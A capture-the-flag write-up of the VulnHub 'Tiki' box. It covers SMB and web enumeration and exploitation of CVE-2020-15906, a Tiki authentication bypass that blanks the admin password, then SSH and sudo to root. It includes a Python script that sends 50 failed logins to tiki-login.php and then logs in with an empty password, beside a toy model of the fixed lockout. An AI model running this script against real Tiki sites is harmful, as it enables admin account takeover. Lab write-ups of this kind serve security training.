VulnHub: Tiki

Ryan Yager
4 min readSep 27, 2022


Today we will be looking at an easier box named Tiki, which can be downloaded from VulnHub. As usual, we start off with an Nmap scan:

The scan shows that SMB is open. Listing the shares with smbclient -L reveals one that is not a default share; digging into it, we find a note addressed to a user named silky:

It looks like we have a CMS password. However, browsing to the web server only gives us the default Apache page, so let's run a gobuster scan and see what we are missing:

We find a site called Tiki. Let's check it out and see whether we can log in as silky:

That worked! Now we need to enumerate the site. Using the Wiki entry in the side menu, go to Last Changes and then click All:

Now click on any one of the wiki pages and then on History; from there we can compare the different versions that were written by admin:

Clicking through the different versions, we finally find the CVE:

It points us at CVE-2020-15906. Searchsploit returns nothing for that number directly; however, looking through what Searchsploit does have for Tiki and matching on the 2020 date gets us there. Looking the CVE up online also tells us what it is: an authentication bypass in Tiki versions before 21.2, where 50 invalid login attempts against the admin account cause tiki-login.php to set the admin password to a blank value. The attempts have to actually fail, so any wrong password will do. After sending them, we log in as admin with an empty password using Burp Suite, as shown below:
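As an added example (my own code, not part of the original walkthrough and not Tiki's code), the following Python models the CVE-2020-15906 logic that the box relies on and then drives it: a constructed toy login handler that blanks the password after 50 failures, the lockout it should have had instead, and the attacker loop that sends the failures and then logs in with an empty password. The `tiki_login_factory` transport, the form field names `user`, `pass` and `login`, and the redirect-based success check are my assumptions about the Tiki login form; verify them in Burp before pointing the script at the box.

```python
"""Model of CVE-2020-15906 (Tiki before 21.2): after 50 invalid login attempts
the "brute-force protection" blanks the admin password instead of locking the
account.  The server classes below are a constructed toy, not Tiki's PHP code;
the attacker helper drives whatever login callable it is given, so the same
loop works against the toy here and, via the optional requests transport at
the bottom, against a real host."""
from dataclasses import dataclass, field
from typing import Callable, Dict, Set

# Number of failed attempts after which Tiki cleared the password, per the CVE text.
LOCKOUT_THRESHOLD = 50


@dataclass
class VulnerableLogin:
    """Constructed toy of the flawed check: the counter trips and the password becomes ''."""
    passwords: Dict[str, str]
    failures: Dict[str, int] = field(default_factory=dict)

    def login(self, user: str, password: str) -> bool:
        if user not in self.passwords:
            return False
        if self.passwords[user] == password:
            self.failures[user] = 0
            return True
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= LOCKOUT_THRESHOLD:
            # The bug: "protecting" the account by resetting its password to blank.
            self.passwords[user] = ""
        return False


@dataclass
class LockedOutLogin(VulnerableLogin):
    """What a sane lockout looks like: the account stops accepting logins entirely."""
    locked: Set[str] = field(default_factory=set)

    def login(self, user: str, password: str) -> bool:
        if user in self.locked or user not in self.passwords:
            return False
        if self.passwords[user] == password:
            self.failures[user] = 0
            return True
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= LOCKOUT_THRESHOLD:
            self.locked.add(user)  # lock the account, leave the stored credential alone
        return False


def bypass(login: Callable[[str, str], bool], user: str = "admin",
           attempts: int = LOCKOUT_THRESHOLD) -> bool:
    """Send `attempts` deliberately wrong passwords, then try the empty one.

    `login(user, password)` must return True on success.  Returns whether the
    final blank-password login succeeded."""
    for i in range(attempts):
        login(user, f"definitely-wrong-{i}")
    return login(user, "")


def tiki_login_factory(base_url: str) -> Callable[[str, str], bool]:
    """Build a login callable for a live Tiki instance.  Assumptions to verify in Burp:
    - the form posts to /tiki-login.php with fields user, pass and login;
    - a successful login answers with a redirect away from tiki-login.php,
      while a failure redirects back to it or re-renders the form."""
    import requests  # imported here so the offline model above needs no third-party package

    session = requests.Session()

    def login(user: str, password: str) -> bool:
        r = session.post(f"{base_url.rstrip('/')}/tiki-login.php",
                         data={"user": user, "pass": password, "login": "Login"},
                         allow_redirects=False, timeout=10)
        location = r.headers.get("Location", "")
        return r.status_code in (301, 302, 303) and "tiki-login.php" not in location

    return login


if __name__ == "__main__":
    toy = VulnerableLogin({"admin": "correct horse battery staple"})
    print("vulnerable: blank-password login worked:", bypass(toy.login))   # True
    fixed = LockedOutLogin({"admin": "correct horse battery staple"})
    print("locked out: blank-password login worked:", bypass(fixed.login))  # False
    # Against the box (address and path assumed):
    # bypass(tiki_login_factory("http://10.0.0.5/tiki"))
```

The count matters: 49 wrong guesses leave the real password in place, and it is the 50th failure that blanks it, so a blank-password attempt that fails once may succeed on the very next try. The `LockedOutLogin` variant shows why the fix is to refuse further logins rather than to touch the stored credential.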

We are now in as the admin user. From here you may think to upload a PHP reverse shell; I thought the same thing, and after about 30 minutes I realised it was not going to work. Looking around the site instead, I found some credentials:

We can try to SSH in as silky with the credentials we found:

Now for the privilege escalation. Always try sudo -l, especially when you have the user's password. It shows that this user can run everything as root via sudo, so a quick sudo su gives us a root shell.

That is it, hopefully you liked the box and thanks for reading.

Written by Ryan Yager

Known on Twitch and YouTube as OvergrownCarrot1 or OGC